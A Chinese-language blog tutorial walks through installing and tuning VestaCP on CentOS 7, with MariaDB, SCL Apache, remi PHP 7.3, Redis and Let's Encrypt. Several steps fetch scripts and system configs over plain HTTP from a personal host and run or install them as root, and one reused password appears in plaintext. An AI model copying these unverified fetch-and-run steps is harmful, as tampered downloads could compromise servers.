逆向行驶 最爱的最残酷、最美的最虚无
由于remi的PHP版本强制绑定原厂repo内建的httpd,所以本套方案无法完全适用于上线环境,要采用的一定要跳过安装SCL的httpd的相关步骤! 👀
有网友透过连络表单提问我关于安装VestaCP的正确姿势 🤔 我查了一下发现原因可能是因为最近remi的PHP版本上升到7.4,如果安装时勾选使用remi的repo就会直升到php 7.4,但是php 7.4的相容性还不高 🤔 而VestaCP这套虚拟主机管理系统,我已经使用了大约七年以上,除了有过一次比较严重的伺服器遭骇,其实问题还不算大,root的密码和VestaCP控制台管理员的密码同时有改过就没事了 🤔 这边先提供一个探针以及我自己手动安装的笔记~ 🐱👤
安装VestaCP
先说明,了解这个安装过程大约需要一点时间,虽然下面的指令看起来很长,但其实可以存到笔记本上,只要先修改好域名、帐密的资料(都有按照CODE分别编排,要认真阅读唷 🤔 ),在SSH操作整个动作只需要10分钟不到,这才是我觉得使用VestaCP最方便的地方 🤔
安装前先删除MariaDB旧版本,然后采用MariaDB官方提供的最新版本,目前是10.4 ✍✍✍
|
1 2 3 4 5 6 |
yum remove -y mariadb mariadb-\* # 更新MariaDB repo sudo rpm --import https://yum.mariadb.org/RPM-GPG-KEY-MariaDB wget -O /etc/yum.repos.d/MariaDB.repo http://ns4.edu.ryukyu/conf/MariaDB.repo clear cat /etc/yum.repos.d/MariaDB.repo | grep baseurl |
### 透过screen来准备开始安装VestaCP (避免中途断线) 🤔
|
1 2 3 4 5 |
screen -S vestacp cd /opt rm -f /opt/vst-install.sh curl -O http://vestacp.com/pub/vst-install.sh chmod 755 vst-install.sh |
# 开始安装时需注意将下列资料先做替换 🤔
- hostname 520.be // 使用的域名
- email admin@520.be // 管理员的邮件信箱
- password y1d6u8YfPhxE // 管理员的密码
# 由于我只选择安装主要的网站服务,资安问题由我认为更为全面的CSF防火墙负责,过滤垃圾信的spamassassin则因为耗用记忆体过大而放弃安装,有需要的可以自行将spamassassin、clamav这两个部分改为yes 🤔
bash vst-install.sh --nginx yes --apache yes --phpfpm no --named yes --remi no --vsftpd yes --proftpd no --iptables no --fail2ban no --quota no --exim yes --dovecot yes --spamassassin no --clamav no --softaculous no --mysql yes --postgresql no --hostname 520.be --email admin@520.be --password y1d6u8YfPhxE --force
# 安装完成后,连结VestaCP的小程式到/usr/bin来方便操作 🤔
|
1 2 3 |
source /root/.bash_profile PATH=$PATH:/usr/local/vesta/bin export VESTA=/usr/local/vesta/ |
# 增强phpMyAdmin设定档内的blowfish_secret数值 🤔
|
1 2 3 4 |
cp -f /etc/phpMyAdmin/config.inc.php /etc/phpMyAdmin/config.inc.php.bak sed -i "s@blowfish_secret.*;@blowfish_secret\'\] = \'`cat /dev/urandom | head -1 | md5sum | head -c 33`\';@" /etc/phpMyAdmin/config.inc.php mkdir -p /var/lib/phpMyAdmin/temp/ chown -R apache:apache /var/lib/phpMyAdmin |
# 删除不需要的主机方案 🤔
|
1 2 3 4 5 6 7 8 9 |
v-delete-database admin admin_default v-delete-user-package palegreen v-delete-user-package gainsboro v-delete-user-package slategrey rm -fr /usr/local/vesta/install/rhel/5 rm -fr /usr/local/vesta/install/rhel/6 rm -fr /usr/local/vesta/install/debian rm -fr /usr/local/vesta/install/ubuntu rm -f vst-install.sh vst-install-rhel.sh |
# 微调VestaCP基本设定 🤔
|
1 2 3 4 5 6 |
sed -i "s#LANGUAGE='.*'#LANGUAGE='tw'#g" /usr/local/vesta/conf/vesta.conf sed -i "s#LANGUAGE='.*'#LANGUAGE='tw'#g" /usr/local/vesta/data/users/admin/user.conf sed -i "s#100000#unlimited#g" /usr/local/vesta/data/users/admin/user.conf sed -i "s#100#unlimited#g" /usr/local/vesta/data/users/admin/user.conf sed -i "s#100000#unlimited#g" /usr/local/vesta/data/packages/default.pkg sed -i "s#100#unlimited#g" /usr/local/vesta/data/packages/default.pkg |
# 变更资料库编码 🤔
|
1 2 3 4 |
mysql -V rm -f /etc/my.cnf.d/mysql-clients.cnf.bak mv /etc/my.cnf.d/mysql-clients.cnf /etc/my.cnf.d/mysql-clients.cnf.bak wget -O /etc/my.cnf.d/mysql-clients.cnf http://ns4.edu.ryukyu/VestaCP_conf/mysql-clients.cnf |
### 更新最佳化my.cnf (限制MariaDB Version 10+),这边提供的是我自己使用的,如果使用上发生问题,我强烈建议先换回VestaCP原厂提供的my.cnf 🤔
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
mkdir -p /var/log/mariadb mkdir -p /var/run/mariadb touch /var/log/mariadb/mariadb.log chown -R mysql:mysql /var/log/mariadb chown -R mysql:mysql /var/run/mariadb rm -f /etc/my.cnf.bak mv /etc/my.cnf /etc/my.cnf.bak # 1GB的VPS推荐使用此my.cnf wget -O /etc/my.cnf http://ns4.edu.ryukyu/VestaCP_conf/my.cnf_1GBRAM.md # 4GB的VPS可以换成这个my.cnf(也是本站使用的设定值),再更高档的机器可以再自行调整buffer_size相关的数值 # vi +/buffer_size /etc/my.cnf # wget -O /etc/my.cnf http://ns4.edu.ryukyu/VestaCP_conf/my.cnf_4GBRAM.md # 重启MariaDB systemctl enable mariadb && systemctl is-enabled mariadb systemctl restart mariadb && systemctl status mariadb -l # 查询执行状态 ps ax | grep mysqld && lsof -itcp -n -P | grep mysqld # 查询MariaDB错误之记录档 tail -50 /var/log/mariadb/mariadb_error.log |
# PS. 查询MySQL root密码的方法如下
cat /usr/local/vesta/conf/mysql.conf | grep PASSWORD
# VestaCP原厂提供的my.cnf,开源的就是方便 🤔
|
1 2 3 4 5 6 |
# my-small.cnf wget -O /etc/my.cnf https://github.com/serghey-rodin/vesta/raw/master/install/rhel/7/mariadb/my-small.cnf # my-medium.cnf wget -O /etc/my.cnf https://github.com/serghey-rodin/vesta/raw/master/install/rhel/7/mariadb/my-medium.cnf # my-large.cnf wget -O /etc/my.cnf https://github.com/serghey-rodin/vesta/raw/master/install/rhel/7/mariadb/my-large.cnf |
### 安装一些实用的检测工具 🤔
# X探针 🤔
wget -O /home/admin/web/520.be/public_html/XProber.php https://raw.githubusercontent.com/kmvan/x-prober/master/dist/prober.php
# 热门的Vanilla Forums论坛程式提供的PHP效能测试工具 🤔
wget -O /home/admin/web/520.be/public_html/vanilla-php_benchmark_script.php https://raw.githubusercontent.com/vanilla-php/benchmark-php/master/benchmark.php
# cloudwp提供的检测PHP执行使用者帐号工具 🤔
wget -O /home/admin/web/520.be/public_html/cloud_whoami.php https://gist.githubusercontent.com/neltseng/876bd30b6438f8fd02ac/raw/22ae9d43635dd895fdca9df8fd2584611f640d2f/whoami.php
# WoltLab提供的PHP环境检测工具 🤔
wget -O /home/admin/web/520.be/public_html/WCF_Test.php https://www.woltlab.com/media/301-test-php/
# 重设所有网站资料夹、档案的权限,ref. [HOWTO] Correct files and folders permissions and ownership 🤔
|
1 2 3 |
wget -O /usr/local/vesta/bin/v-fix-websites-permissions http://ns4.edu.ryukyu/VestaCP_conf/v-fix-websites-permissions chmod +x /usr/local/vesta/bin/v-fix-websites-permissions v-fix-websites-permissions |
### 启用awstats统计系统 🤔
v-add-web-domain-stats admin 520.be awstats
### 建立资料库,指令是v-add-database VestaCP使用者 资料库名称 资料库使用者 使用者密码 🤔
- MySQL资料库名称:admin_db001
- MySQL使用者名称:admin_user001
- MySQL使用者密码 :y1d6u8YfPhxE
v-add-database admin db001 user001 y1d6u8YfPhxE mysql
### 建立FTP帐号,指令是v-add-web-domain-ftp VestaCP使用者 网域名称 ftp使用者 ftp使用者密码 🤔
- ftp登录帐号:admin_ftp001
- ftp登录密码:y1d6u8YfPhxE
groupadd sftp-only
v-add-web-domain-ftp admin 520.be ftp001 y1d6u8YfPhxE
至此,初始环境资讯如下 🤔
- VestaCP控制台: https://520.be:8083
- X探针: http://520.be/XProber.php
- PHP环境检测工具: http://520.be/WCF_Test.php
- PHP效能测试工具: http://520.be/vanilla-php_benchmark_script.php
- 检测PHP执行使用者帐号工具: http://520.be/cloud_whoami.php
- 本机路径: /home/admin/web/520.be/public_html
- FTP帐号: admin_ftp001
- FTP密码: y1d6u8YfPhxE
- FTP快速连结: ftp://admin_ftp001:y1d6u8YfPhxE@520.be/public_html
- MySQL资料库名称: admin_db001
- MySQL使用者名称: admin_user001
- MySQL使用者密码: y1d6u8YfPhxE
升级Apache
SCL是CentOS内已经内建的repo,经过官方认证的当然可以放心地使用,所以我这边是使用它来更新Apache HTTP Server 🤔
### 备份档案 🤔
|
1 2 3 4 5 6 7 8 9 10 |
cd /usr/share/ mv roundcubemail/ roundcubemail_BAK/ mv phpMyAdmin/ phpMyAdmin_BAK/ cd /etc/httpd/conf.d/ mv roundcubemail.conf roundcubemail.conf.bak mv phpMyAdmin.conf phpMyAdmin.conf.bak cd /etc cp -r httpd httpd_BAK cp -r roundcubemail roundcubemail_BAK cp -r phpMyAdmin phpMyAdmin_BAK |
# 安装SCL的repo 🤔
|
1 2 3 |
yum install -y epel-release centos-release-scl-rh centos-release-scl sudo yum-config-manager --enable epel centos-sclo-rh centos-sclo-sclo yum repolist |
# 删除旧版本的PHP 🤔
|
1 2 3 4 |
# sudo yum remove -y php74-php-\* sudo yum remove -y php php-tidy php-gd php-xmlrpc php-common php-xml \ php-process php-cli php-mysql php php-soap php-mcrypt php-mbstring \ php-bcmath php-pdo php-imap |
# 安装SCL版本的Apache 🤔
|
1 2 3 4 5 6 7 |
sudo yum install -y libcap-devel sudo yum install -y httpd24-httpd httpd24-httpd-tools httpd24-libcurl \ httpd24-nghttp2 httpd24-libnghttp2 httpd24-libnghttp2-devel \ httpd24-runtime httpd24 httpd24-curl httpd24-httpd-devel \ httpd24-libcurl-devel httpd24-mod_ldap httpd24-mod_session \ httpd24-mod_ssl sclo-httpd24-mod_ruid2 scl enable httpd24 bash |
# 建立软连结到预设位置 🤔
|
1 2 3 4 5 6 7 8 |
sudo ln -s /opt/rh/httpd24/root/usr/sbin/apachectl /usr/sbin/apachectl sudo ln -s /opt/rh/httpd24/root/usr/sbin/fcgistarter /usr/sbin/fcgistarter sudo ln -s /opt/rh/httpd24/root/usr/sbin/httpd /usr/sbin/httpd sudo ln -s /opt/rh/httpd24/root/usr/sbin/httpd-scl-wrapper /usr/sbin/httpd-scl-wrapper sudo ln -s /opt/rh/httpd24/root/usr/sbin/rotatelogs /usr/sbin/rotatelogs sudo ln -s /opt/rh/httpd24/root/usr/sbin/suexec /usr/sbin/suexec ls -lha /usr/sbin | grep httpd httpd -v |
# 还原设定档 🤔
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
rm -f /opt/rh/httpd24/root/etc/httpd/conf.d/* cp /etc/httpd_BAK/conf.d/* /opt/rh/httpd24/root/etc/httpd/conf.d rm -fr /etc/httpd/conf.d sudo unlink /etc/httpd/conf.d sudo ln -s /opt/rh/httpd24/root/etc/httpd/conf.d /etc/httpd/conf.d rm -f /opt/rh/httpd24/root/etc/httpd/conf.d/php.conf rm -f /opt/rh/httpd24/root/etc/httpd/conf.modules.d/10-fcgid.conf cp /etc/httpd_BAK/conf.modules.d/10-fcgid.conf /opt/rh/httpd24/root/etc/httpd/conf.modules.d rm -fr /etc/httpd/conf.modules.d sudo unlink /etc/httpd/conf.modules.d sudo ln -s /opt/rh/httpd24/root/etc/httpd/conf.modules.d /etc/httpd/conf.modules.d rm -f /opt/rh/httpd24/root/etc/httpd/conf/* cp /etc/httpd_BAK/conf/* /opt/rh/httpd24/root/etc/httpd/conf rm -fr /etc/httpd/conf sudo unlink /etc/httpd/conf sudo ln -s /opt/rh/httpd24/root/etc/httpd/conf /etc/httpd/conf sudo unlink /opt/rh/httpd24/root/usr/lib64/httpd/modules/mod_fcgid.so sudo ln -s /usr/lib64/httpd/modules/mod_fcgid.so /opt/rh/httpd24/root/usr/lib64/httpd/modules/mod_fcgid.so sudo unlink /etc/httpd/modules sudo ln -s /opt/rh/httpd24/root/usr/lib64/httpd/modules /etc/httpd/modules sudo unlink /usr/libexec/httpd-ssl-pass-dialog sudo ln -s /opt/rh/httpd24/root/usr/libexec/httpd-ssl-pass-dialog /usr/libexec/httpd-ssl-pass-dialog sed -i '/ruid2_module/d' /opt/rh/httpd24/root/etc/httpd/conf.d/ruid2.conf |
至此,Apache已经更新完了,启动会在下方PHP更新完毕后一起启动 🤔
升级PHP
安装remi的repo,由于SCL的PHP 7.2相关模组数量不多,所以我还是采用remi的PHP 7.3 🤔
|
1 2 3 4 |
yum install -y http://mirrors.mediatemple.net/remi/enterprise/remi-release-7.rpm sudo yum-config-manager --enable remi remi-php73 sudo yum-config-manager --disable remi-php54 remi-php55 remi-php56 remi-php70 remi-php71 remi-php72 remi-php74 remi-test remi-safe yum repolist |
### 安装PHP 7相关套件,下方安装的套件可自行选配 🤔
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
# 安装PHP 7核心组件 sudo yum install -y --enablerepo=remi,remi-php73 php73 php73-build php73-php \ php73-php-cli php73-php-common php73-php-devel php73-php-intl \ php73-runtime php73-php-pear # 安装pecl部分 sudo yum install -y --enablerepo=remi,remi-php73 php73-php-pecl-apcu \ php73-php-pecl-apcu-bc php73-php-pecl-apcu-devel php73-php-pecl-crypto \ php73-php-pecl-event php73-php-pecl-geoip php73-php-pecl-http \ php73-php-pecl-imagick php73-php-pecl-inotify php73-php-pecl-ip2location \ php73-php-pecl-mcrypt php73-php-pecl-memcached php73-php-pecl-mongodb \ php73-php-pecl-mysql php73-php-pecl-oauth php73-php-pecl-radius \ php73-php-pecl-rar php73-php-pecl-rrd php73-php-pecl-swoole4 \ php73-php-pecl-tcpwrap php73-php-pecl-varnish php73-php-pecl-xmldiff \ php73-php-pecl-zip # 安装配套组件 sudo yum install -y --enablerepo=remi,remi-php73 php73-php-bcmath php73-php-gd \ php73-php-imap php73-php-ldap php73-php-litespeed php73-php-mbstring \ php73-php-mysqlnd php73-php-opcache php73-php-phalcon3 php73-php-pdo \ php73-php-pgsql php73-php-pspell php73-php-snmp php73-php-tidy \ php73-php-xmlrpc php73-unit-php php73-uwsgi-plugin-php php-tcpdf \ php-tcpdf-dejavu-sans-fonts php73-php-ioncube-loader \ phpMyAdmin roundcubemail webalizer |
# 调整PHP参数,disable_functions的部分可自行选配 🤔
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
rm -fr /etc/php.d /etc/php.ini /etc/php.ini.rpmsave sudo ln -s /etc/opt/remi/php73/php.ini /etc/php.ini rm -f /etc/opt/remi/php73/php.ini.bak cp /etc/opt/remi/php73/php.ini /etc/opt/remi/php73/php.ini.bak sed -i "s/disable_functions =.*/disable_functions = passthru,system,chroot,chgrp,chown,shell_exec,ini_alter,ini_restore,dl,readlink,symlink,popepassthru,stream_socket_server,fsocket/" /etc/opt/remi/php73/php.ini rm -f /etc/opt/remi/php73/php.ini.bak cp /etc/opt/remi/php73/php.ini /etc/opt/remi/php73/php.ini.bak sed -i 's/;upload_tmp_dir =/upload_tmp_dir = \/tmp/g' /etc/opt/remi/php73/php.ini sed -i 's/max_input_time =.*/max_input_time = 3600/' /etc/opt/remi/php73/php.ini sed -i 's/max_execution_time =.*/max_execution_time = 3600/' /etc/opt/remi/php73/php.ini sed -i 's/max_file_uploads =.*/max_file_uploads = 200/g' /etc/opt/remi/php73/php.ini sed -i 's/post_max_size =.*/post_max_size = 1024M/' /etc/opt/remi/php73/php.ini sed -i 's/memory_limit = .*/memory_limit = 512M/' /etc/opt/remi/php73/php.ini sed -i 's/upload_max_filesize =.*/upload_max_filesize = 1024M/' /etc/opt/remi/php73/php.ini sed -i 's/output_buffering =.*/output_buffering = 'Off'/' /etc/opt/remi/php73/php.ini sed -i 's/;date.timezone.*/date.timezone = Asia\/\Taipei/' /etc/opt/remi/php73/php.ini sed -i 's/;session.cookie_secure.*/session.cookie_secure = True/' /etc/opt/remi/php73/php.ini |
# 调整OPcache参数 🤔
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
rm -f /etc/opt/remi/php73/php.d/10-opcache.ini.bak mv /etc/opt/remi/php73/php.d/10-opcache.ini /etc/opt/remi/php73/php.d/10-opcache.ini.bak cat <<"EOF" > /etc/opt/remi/php73/php.d/10-opcache.ini ; Enable Zend OPcache extension module [opcache] zend_extension=opcache opcache.enable=1 opcache.enable_cli=1 opcache.interned_strings_buffer=8 opcache.max_accelerated_files=10000 opcache.memory_consumption=128 opcache.save_comments=1 opcache.revalidate_freq=1 opcache.fast_shutdown=1 EOF |
# 建立软连结到预设位置 🤔
|
1 2 3 4 5 6 7 8 9 10 11 12 |
sudo ln -s /opt/remi/php73/root/usr/bin/php /usr/bin/php sudo ln -s /opt/remi/php73/root/usr/bin/php-cgi /usr/bin/php-cgi sudo ln -s /opt/remi/php73/root/usr/bin/php-config /usr/bin/php-config sudo ln -s /opt/remi/php73/root/usr/bin/phpize /usr/bin/phpize sudo ln -s /opt/remi/php73/root/usr/bin/pecl /usr/bin/pecl sudo ln -s /opt/remi/php73/root/usr/bin/pear /usr/bin/pear sudo ln -s /opt/remi/php73/root/usr/bin/phar.phar /usr/bin/phar ls -lha /usr/bin | grep php pear version pecl help version phar version php -v |
# 增加每日凌晨3点5分更新remi相关套件的排程 🤔
|
1 2 |
crontab -l | { cat; echo "5 3 * * * sudo yum --enablerepo=remi,remi-php73 update -y > /dev/null 2>&1"; } | crontab - crontab -l |
### 安装SCL版本的Redis 🤔
|
1 2 3 4 5 |
# yum list rh-redis5-\* sudo yum remove -y redis && sudo yum install -y rh-redis5 rh-redis5-redis scl enable rh-redis5 bash # 安装Redis的PHP模组 sudo yum install -y --enablerepo=remi,remi-php73 php73-php-phpiredis php73-php-pecl-redis5 php73-php-pecl-igbinary php73-php-pecl-igbinary-devel |
# 调整Redis参数,记忆体大于1GB的可再往上调高maxclients、maxmemory数值,但不建议占用整体记忆体太多,Redis吃起来也很恐怖的 🤔
|
1 2 3 4 5 6 |
sed -i 's/# maxclients 10000/maxclients 128/g' /etc/opt/rh/rh-redis5/redis.conf sed -i 's/daemonize no/daemonize yes/g' /etc/opt/rh/rh-redis5/redis.conf sed -i 's/timeout 0/timeout 300/g' /etc/opt/rh/rh-redis5/redis.conf sed -i 's/# maxmemory <bytes>/maxmemory 100mb/g' /etc/opt/rh/rh-redis5/redis.conf sed -i '/overcommit_memory/d' /etc/sysctl.conf sed -i '$avm.overcommit_memory = 1' /etc/sysctl.conf |
# 建立软连结到预设位置 🤔
|
1 2 3 4 5 6 7 8 |
sudo unlink /usr/bin/redis-benchmark sudo ln -s /opt/rh/rh-redis5/root/usr/bin/redis-benchmark /usr/bin/redis-benchmark sudo unlink /usr/bin/redis-cli sudo ln -s /opt/rh/rh-redis5/root/usr/bin/redis-cli /usr/bin/redis-cli sudo unlink /usr/bin/redis-server sudo ln -s /opt/rh/rh-redis5/root/usr/bin/redis-server /usr/bin/redis-server ls -lha /usr/bin | grep redis redis-server -v |
# 启动Redis 🤔
|
1 2 3 4 5 6 7 |
# 启动Redis systemctl enable rh-redis5-redis && systemctl is-enabled rh-redis5-redis systemctl restart rh-redis5-redis && systemctl status rh-redis5-redis -l # 验证Redis ps ax | grep redis-server && lsof -itcp -n -P | grep redis-server php -m | grep redis php -m | grep igbinary |
### 安装remi提供的Memcached 🤔
|
1 2 3 4 5 |
yum --enablerepo=remi,remi-php73 install -y memcached libmemcached-opt php73-php-pecl-memcached php -m | grep memcached # 增加每日凌晨3点10分更新Memcached的排程 crontab -l | { cat; echo "10 3 * * * yum --enablerepo=remi,remi-php73 update -y memcached libmemcached-opt php73-php-pecl-memcached > /dev/null 2>&1"; } | crontab - crontab -l |
### 还原设定档 🤔
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
# 还原RoundCube档案 rm -f /etc/roundcubemail/defaults.inc.php rm -f /etc/roundcubemail/mimetypes.php rm -f /etc/roundcubemail/config.inc.php.bak mv /etc/roundcubemail/config.inc.php /etc/roundcubemail/config.inc.php.bak cp -f /etc/roundcubemail_BAK/config.inc.php /etc/roundcubemail/config.inc.php cp -f /etc/roundcubemail_BAK/defaults.inc.php /etc/roundcubemail/defaults.inc.php cp -f /etc/roundcubemail_BAK/mimetypes.php /etc/roundcubemail/mimetypes.php rm -f /etc/roundcubemail/roundcubemail.conf cp -f /usr/share/roundcubemail_BAK/plugins/password/drivers/vesta.php /usr/share/roundcubemail/plugins/password/drivers/vesta.php cp -f /usr/share/roundcubemail_BAK/plugins/password/config.inc.php /usr/share/roundcubemail/plugins/password/config.inc.php # 还原phpMyAdmin档案 rm -f /etc/phpMyAdmin/config.inc.php cp /etc/phpMyAdmin_BAK/config.inc.php /etc/phpMyAdmin # 设定权限 chown -R root:apache /etc/roundcubemail chown -R root:apache /etc/phpMyAdmin chown -R root:apache /usr/share/roundcubemail chown -R root:apache /usr/share/phpMyAdmin |
# 建立PHP的软连结到SCL版本的HTTPD 🤔
|
1 2 3 4 5 |
wget -O /opt/rh/httpd24/root/etc/httpd/conf.d/php73-php.conf http://ns4.edu.ryukyu/VestaCP_conf/php73-php.conf.md rm -f /opt/rh/httpd24/root/etc/httpd/conf.modules.d/15-php.conf rm -f /opt/rh/httpd24/root/etc/httpd/conf.modules.d/15-php73.conf sudo unlink /opt/rh/httpd24/root/usr/lib64/httpd/modules/libphp73.so sudo ln -s /opt/remi/php73/root/usr/lib64/httpd/modules/libphp7.so /opt/rh/httpd24/root/usr/lib64/httpd/modules/libphp73.so |
# 建立libraries连结 🤔
|
1 2 3 4 5 6 |
cp /etc/ld.so.conf /etc/ld.so.conf.bak echo "/usr/local/lib" >> /etc/ld.so.conf echo "/usr/local/lib64" >> /etc/ld.so.conf echo "/opt/rh/httpd24/root/usr/lib64" >> /etc/ld.so.conf echo "/opt/remi/php73/root/usr/lib64" >> /etc/ld.so.conf ldconfig |
# 变更open_basedir设定 🤔
sed -i 's#open_basedir .*#open_basedir %docroot%:%home%/%user%/tmp:/proc/#g' /usr/local/vesta/data/templates/web/httpd/default.tpl
sed -i 's#open_basedir .*#open_basedir %sdocroot%:%home%/%user%/tmp:/proc/#g' /usr/local/vesta/data/templates/web/httpd/default.stpl
sed -i 's#/home/admin/tmp#/home/admin/tmp:/proc/#g' /home/admin/conf/web/520.be.httpd.conf
### 建立自动重启服务设定 🤔
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
# 建立自动重启SCL版本Apache服务设定 mkdir -p /etc/systemd/system/httpd24-httpd.service.d/ rm -f /etc/systemd/system/httpd24-httpd.service.d/restart.conf cat <<"EOF" > /etc/systemd/system/httpd24-httpd.service.d/restart.conf [Service] Restart=on-failure RestartSec=3 EOF clear # 建立自动重启nginx服务设定 mkdir -p /etc/systemd/system/nginx.service.d/ rm -f /etc/systemd/system/nginx.service.d/restart.conf cat <<"EOF" > /etc/systemd/system/nginx.service.d/restart.conf [Service] Restart=on-failure RestartSec=3 EOF clear # 建立自动重启MariaDB服务设定 mkdir -p /etc/systemd/system/mariadb.service.d/ rm -f /etc/systemd/system/mariadb.service.d/restart.conf cat <<"EOF" > /etc/systemd/system/mariadb.service.d/restart.conf [Service] Restart=on-failure RestartSec=3 EOF cat <<"EOF" > /etc/systemd/system/mariadb.service.d/override.conf [Service] LimitNOFILE=65535 EOF clear systemctl daemon-reload systemctl stop httpd && systemctl disable httpd |
### 启用SCL版本Apache 🤔
|
1 2 3 4 5 6 7 8 9 10 11 12 |
# 验证Apache的设定档案内容 wget -O /opt/rh/httpd24/root/etc/httpd/conf/httpd.conf http://ns4.edu.ryukyu/VestaCP_conf/httpd.conf /opt/rh/httpd24/root/usr/sbin/apachectl -t # 启用SCL版本Apache服务 rm -f /usr/lib/systemd/system/httpd.service sudo ln -s /usr/lib/systemd/system/httpd24-httpd.service /usr/lib/systemd/system/httpd.service systemctl enable httpd && systemctl is-enabled httpd systemctl daemon-reload # 启动Apache服务 systemctl restart httpd && systemctl status httpd -l /opt/rh/httpd24/root/usr/sbin/apachectl -V lsof -itcp -n -P | grep httpd |
至此,所有网站服务都以更新完毕啦 🤔
安装HTTPS、HSTS、HTTP2、OCSP
LetsEncrypt SSL已经很稳定的运行好几年了,免费版SSL当然是最优先使用该品牌的,而且VestaCP也很好的配合能够自动更新唷 🤔
v-add-letsencrypt-domain admin 520.be
v-list-web-domains admin
v-update-host-certificate admin $HOSTNAME
echo "UPDATE_HOSTNAME_SSL='yes'" >> /usr/local/vesta/conf/vesta.conf
### 部署Let’s Encrypt SSL证书给VestaCP使用 🤔
rm -f /usr/local/vesta/ssl/*.bak
mv /usr/local/vesta/ssl/certificate.ca /usr/local/vesta/ssl/certificate.ca.bak
ln -fs /home/admin/conf/web/ssl.520.be.ca /usr/local/vesta/ssl/certificate.ca
mv /usr/local/vesta/ssl/certificate.crt /usr/local/vesta/ssl/certificate.crt.bak
ln -fs /home/admin/conf/web/ssl.520.be.crt /usr/local/vesta/ssl/certificate.crt
mv /usr/local/vesta/ssl/certificate.key /usr/local/vesta/ssl/certificate.key.bak
ln -fs /home/admin/conf/web/ssl.520.be.key /usr/local/vesta/ssl/certificate.key
mv /usr/local/vesta/ssl/certificate.pem /usr/local/vesta/ssl/certificate.pem.bak
ln -fs /home/admin/conf/web/ssl.520.be.pem /usr/local/vesta/ssl/certificate.pem
chown -h root:mail /usr/local/vesta/ssl/certificate.ca
chown -h root:mail /usr/local/vesta/ssl/certificate.crt
chown -h root:mail /usr/local/vesta/ssl/certificate.key
chown -h root:mail /usr/local/vesta/ssl/certificate.pem
service vesta restart && service vesta status -l
### 部署Let’s Encrypt SSL证书给Webmin使用 🤔
|
1 2 3 4 5 6 7 8 9 10 |
rm -f /etc/webmin/miniserv.conf.bak cp /etc/webmin/miniserv.conf /etc/webmin/miniserv.conf.bak echo "extracas=/usr/local/vesta/ssl/certificate.ca" >> /etc/webmin/miniserv.conf echo "certfile=/usr/local/vesta/ssl/certificate.crt" >> /etc/webmin/miniserv.conf sed -i 's#extracas=.*#extracas=/usr/local/vesta/ssl/certificate.ca#g' /etc/webmin/miniserv.conf sed -i 's#certfile=.*#certfile=/usr/local/vesta/ssl/certificate.crt#g' /etc/webmin/miniserv.conf sed -i 's#keyfile=.*#keyfile=/usr/local/vesta/ssl/certificate.key#g' /etc/webmin/miniserv.conf clear cat /etc/webmin/miniserv.conf | grep certificate service webmin restart && service webmin status -l |
### 将建立网站的预设值之模板添加HSTS、http2功能 🤔
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
rm -f /usr/local/vesta/data/templates/web/nginx/default.stpl.bak rm -f /usr/local/vesta/data/templates/web/nginx/hosting.stpl.bak rm -f /usr/local/vesta/data/templates/web/nginx/caching.stpl.bak cp -f /usr/local/vesta/data/templates/web/nginx/default.stpl /usr/local/vesta/data/templates/web/nginx/default.stpl.bak cp -f /usr/local/vesta/data/templates/web/nginx/hosting.stpl /usr/local/vesta/data/templates/web/nginx/hosting.stpl.bak cp -f /usr/local/vesta/data/templates/web/nginx/caching.stpl /usr/local/vesta/data/templates/web/nginx/caching.stpl.bak sed -i '/server_name/a add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;' /usr/local/vesta/data/templates/web/nginx/default.stpl sed -i '/server_name/a add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;' /usr/local/vesta/data/templates/web/nginx/hosting.stpl sed -i '/server_name/a add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;' /usr/local/vesta/data/templates/web/nginx/caching.stpl # 让既有的网站也开启HSTS sed -i '/Strict-Transport-Security/d' /home/admin/conf/web/*.nginx.ssl.conf sed -i '/server_name/a add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;' /home/admin/conf/web/*.nginx.ssl.conf # http2 sed -i 's/proxy_ssl_port% ssl/proxy_ssl_port% http2 ssl/g' /usr/local/vesta/data/templates/web/nginx/default.stpl sed -i 's/proxy_ssl_port% ssl/proxy_ssl_port% http2 ssl/g' /usr/local/vesta/data/templates/web/nginx/hosting.stpl sed -i 's/proxy_ssl_port% ssl/proxy_ssl_port% http2 ssl/g' /usr/local/vesta/data/templates/web/nginx/caching.stpl # 让既有的网站也开启http2 sed -i 's/443 ssl/443 http2 ssl/g' /home/admin/conf/web/*.nginx.ssl.conf |
### 开启OCSP 🤔
|
1 2 3 4 5 6 7 8 9 |
rm -f /usr/local/vesta/ssl/dhparam.pem openssl dhparam 2048 -out /usr/local/vesta/ssl/dhparam.pem cd /usr/local/vesta/ssl wget -O root.pem https://ssl-tools.net/certificates/dac9024f54d8f6df94935fb1732638ca6ad77c13.pem wget -O intermediate.pem https://letsencrypt.org/certs/lets-encrypt-x3-cross-signed.pem rm -f chained.pem cat intermediate.pem > chained.pem cat root.pem >> chained.pem chown -h root:mail /usr/local/vesta/ssl/* |
# 重启网站前后端服务 🤔
|
1 2 3 4 5 6 7 8 9 10 11 |
# 调整nginx负载能力 rm -f /etc/nginx/nginx.conf.bak mv /etc/nginx/nginx.conf /etc/nginx/nginx.conf.bak wget -O /etc/nginx/nginx.conf http://ns4.edu.ryukyu/VestaCP_conf/nginx.conf wget -O /etc/httpd/conf.d/ssl.conf http://ns4.edu.ryukyu/VestaCP_conf/ssl.conf # 验证设定档 nginx -t /opt/rh/httpd24/root/usr/sbin/apachectl -t # 重启服务 nginx -s reload systemctl restart httpd && systemctl status httpd -l |
# 验证OCSP设定,这边要注意一下验证OCSP此步骤不能马上进行,大约需要3小时左右才能正确收到OCSP的通信 🤔
openssl s_client -connect 520.be:443 -status -tlsextdebug < /dev/null 2>&1 | grep -i "OCSP response"
# 建立网站的强制转HTTPS功能 🤔
rm -f /home/admin/web/520.be/public_html/.htaccess.bak
